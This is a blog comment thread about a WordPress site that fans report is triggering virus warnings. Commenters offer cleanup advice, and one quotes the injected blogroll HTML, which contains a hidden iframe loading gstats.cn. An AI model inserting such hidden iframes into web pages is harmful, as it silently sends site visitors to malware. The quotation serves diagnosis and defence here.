Your host provider should have some virus scanning on their servers. :/ Contact them first, as there is very little you can do considering the host machines are theirs.

Thank you, that's what I needed to know.

Who or what is telling you about the viruses and trojans?

What software does cemurphy.net run on? (If you have access at that level.)

I've had two emails from fans in the past two days saying they were getting virus and trojan warnings. It's running on Apache 1.3.41, but I know that through the cpanel and am not the person to be screwing with anything Unix-related.

1.3.41 is a legacy maintenance release, dating to January 2008: the current Apache version is 2.2.11. As Apache goes through a major version number about once a decade, I'd say any hosting company still relying on 1.3.x deserves a good kicking.

Do I take it that you use Windows at home?

If not, then your best bet may be to just mirror the site, weed out the dodgy stuff (anything you didn't put there, basically), nuke everything on the server, and reupload.

If you run Windows, this is somewhat risky -- you might infect your own machine.

In either case, yelling at your hosting company is probably a good idea. And? Run every piece of AV and anti-malware software you can get your hands on on your own machine, just in case!

This wonderful gentleman (no surprise) knows scads more than I, Kit. :) But my point is that some things should be defensible from a server standpoint, so be sure that at least is going on the host side.

It's those "nice" gentlemen from gstats.cn again. (See my previous post about these wastes of carbon) They've inserted themselves in your html again:

<li><a href="http://mizkit.com">mizkit.com</a></li>
<li><a href="http://cemurphy.net/gallery/"><img src="" width="0" height="0"/>Photo Gallery</a><iframe src=http://gstats.cn style=display:none></iframe><a href=# style=display:none><img  width="0" height="0" src=""  alt="Photo Gallery"  /></a></li>

The good news is that it isn't your site directly that's infected, but it's got a pointer off to a world of badness. The bad news is, these people can apparently get in and make changes to your template.

Have you upgraded wordpress lately? If not, they'll get in again.

*sigh* Ah. Thank you. And yes, I'm running the latest WP, so that's not really a good sign.

...actually, what it's getting in to are the blogroll things.

Can you define words or patterns to auto-moderate, in the blogroll? Or simply ban URLs?

Although it's possible this is left over from an old installation of WordPress, and since I've only just started using it again it's only just now being flagged. Anyway, thank you very much.

that's some cold you got going on over there. even infects your website

I ran a scan on the page and got no hits with my AV suite, and you have no ad feeds, so checking with your host is the best way to go, as it could be in one of their meta feeds.